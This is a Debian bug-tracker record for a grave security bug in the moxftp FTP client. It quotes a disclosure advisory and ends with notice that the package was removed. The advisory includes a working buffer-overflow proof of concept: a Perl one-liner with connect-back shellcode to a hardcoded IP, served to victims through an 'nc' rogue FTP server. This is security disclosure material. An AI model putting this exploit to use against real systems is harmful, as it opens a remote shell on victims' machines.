Your message dated Sun, 11 May 2003 20:40:55 +1000
with message-id <[EMAIL PROTECTED]>
and subject line Removed
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 3 Apr 2003 18:37:11 +0000
>From [EMAIL PROTECTED] Thu Apr 03 12:37:11 2003
Return-path: <[EMAIL PROTECTED]>
Received: from luonnotar.infodrom.org [195.124.48.78]
by master.debian.org with esmtp (Exim 3.12 1 (Debian))
id 1919aG-0006ZD-00; Thu, 03 Apr 2003 12:37:08 -0600
Received: by luonnotar.infodrom.org (Postfix, from userid 10)
id 17264366B65; Thu, 3 Apr 2003 20:37:07 +0200 (CEST)
Received: at Infodrom Oldenburg (/\##/\ Smail-3.2.0.102 1998-Aug-2 #2)
from infodrom.org by finlandia.Infodrom.North.DE
via smail from stdin
id <[EMAIL PROTECTED]>
for [EMAIL PROTECTED]; Thu, 3 Apr 2003 20:34:17 +0200 (CEST)
Date: Thu, 3 Apr 2003 20:34:17 +0200
From: Martin Schulze <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: moxftp arbitrary code execution poc/advisory
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <[EMAIL PROTECTED]>
User-Agent: Mutt/1.5.3i
Delivered-To: [EMAIL PROTECTED]
X-Spam-Status: No, hits=-6.1 required=4.0
tests=HAS_PACKAGE,IN_REP_TO,QUOTED_EMAIL_TEXT,REFERENCES,
SIGNATURE_SHORT_SPARSE,SPAM_PHRASE_00_01,SUPERLONG_LINE,
USER_AGENT,USER_AGENT_MUTT
version=2.44
X-Spam-Level:
Package: moxftp
Version: 2.2-18
Severity: grave
Tags: security
Unfortunately I am currently unable to discover the real problem
behind this potential exploit. I'm not even sure if it works
on Linux.
FreeBSD people simply marked this package FORBIDDEN, but didn't
fix the problem either. *sigh*
Regards,
Joey
Knud Erik Højgaard wrote:
> Attached document explains all.
>
> This document is also available from http://kokanins.homepage.dk
>
> --
> Knud
> I. BACKGROUND
>
> According to the vendor moxftp is a "Ftp shell under X Window System".
> /usr/ports/ftp/moxftp
>
> II. DESCRIPTION
>
> Insufficient bounds checking leads to execution of arbitrary code.
>
> III. ANALYSIS
>
> Upon parsing the '220 welcome to server' ftp banner a buffer can be
> overrun, allowing us to execute our arbitrary code. The buffer may be
> constructed as such: [508 bytes][ebp ][eip ][nops][shellcode]. Placing
> the nops and shellcode in the buffer before ebp seems to cause some
> problems, luckily there's plenty of space after eip.
>
> Example run:
>
> $ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x
> 100 .
> "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"
> .. "\n"' > file
> # nc -l -p 21 < file
>
> This sets up a rogue server which will overflow the buffer, and execute
> the shellcode. The shellcode is connect-back to 217.157.2.36 port 10000,
> replace "\xd9\x9d\x02\x24" with a suitable ip for testing.
>
> IV. DETECTION
>
> moxftp-2.2 shipping with the FreeBSD ports system as well as from
> various webpages per 9/2-03 is vulnerable.
>
> V. WORKAROUND
>
> unknown
>
> VI. VENDOR FIX
>
> unknown
>
> VII. CVE INFORMATION
>
> unknown
>
> VIII. DISCLOSURE TIMELINE
>
> unknown
>
> IX. CREDIT
>
> Knud Erik H?jgaard
>
--
Life is too short to run proprietary software. -- Bdale Garbee
Please always Cc to me when replying to me on the lists.
---------------------------------------
Received: (at 187481-done) by bugs.debian.org; 11 May 2003 10:41:40 +0000
>From [EMAIL PROTECTED] Sun May 11 05:41:23 2003
Return-path: <[EMAIL PROTECTED]>
Received: from bangpath.uucico.de [195.71.9.197]
by master.debian.org with esmtp (Exim 3.12 1 (Debian))
id 19EoGh-0005NM-00; Sun, 11 May 2003 05:41:23 -0500
Received: by bangpath.uucico.de (Postfix, from userid 10)
id D9D5926BC4; Sun, 11 May 2003 12:41:21 +0200 (CEST)
Received: by regression.cyrius.com (Postfix, from userid 1000)
id 4881323D48; Sun, 11 May 2003 20:40:55 +1000 (EST)
Date: Sun, 11 May 2003 20:40:55 +1000
From: Martin Michlmayr <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Removed
Message-ID: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Delivered-To: [EMAIL PROTECTED]
X-Spam-Status: No, hits=-7.3 required=4.0
tests=BAYES_01,USER_AGENT_MUTT
version=2.53-bugs.debian.org_2003_05_09
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.53-bugs.debian.org_2003_05_09
(1.174.2.15-2003-03-30-exp)
This package has been removed from Debian unstable because it has been
orphaned for a very long time and nobody adopted it. See
http://lists.debian.org/debian-devel-announce/2003/debian-devel-announce-200304/msg00005.html
for more information.
--
Martin Michlmayr
[EMAIL PROTECTED]
